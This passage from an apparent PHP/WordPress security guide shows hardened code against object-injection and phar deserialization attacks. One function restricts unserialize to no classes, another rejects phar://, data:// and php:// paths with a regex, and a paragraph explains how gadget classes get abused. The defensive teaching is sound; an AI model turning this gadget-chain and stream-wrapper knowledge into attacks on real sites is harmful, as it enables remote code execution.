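    return is_array( $data ) ? $data : array();
}

// Where unserialize() genuinely cannot be avoided (PHP >= 7.0):
// allowed_classes => false turns every object into __PHP_Incomplete_Class,
// which has no methods, so no gadget code can run.
function hardened_unserialize( $blob ) {
    return unserialize( $blob, array( 'allowed_classes' => false ) );
}

// HARDENED 2: refuse any stream wrapper before touching the filesystem, then
// confine the name to the uploads directory.
function hardened_file_exists_check() {
    $file = isset( $_GET['file'] ) ? wp_unslash( $_GET['file'] ) : '';
    // A plain path has no scheme; phar://, data://, php:// and friends all do.
    if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $file ) ) {
        return false;
    }
    $base = realpath( wp_upload_dir()['basedir'] );
    $real = realpath( $base . '/' . basename( $file ) );
    return $real && 0 === strpos( $real, $base . '/' ) && file_exists( $real );
}
```

The gadget class is the part people underestimate: it does not have to be malicious, or even in the vulnerable plugin. Any class loaded on the site (core, another plugin, a vendored library) with a useful `__destruct`, `__wakeup` or `__toString` will do, which is why the fix has to be at the deserialization point rather than in the classes.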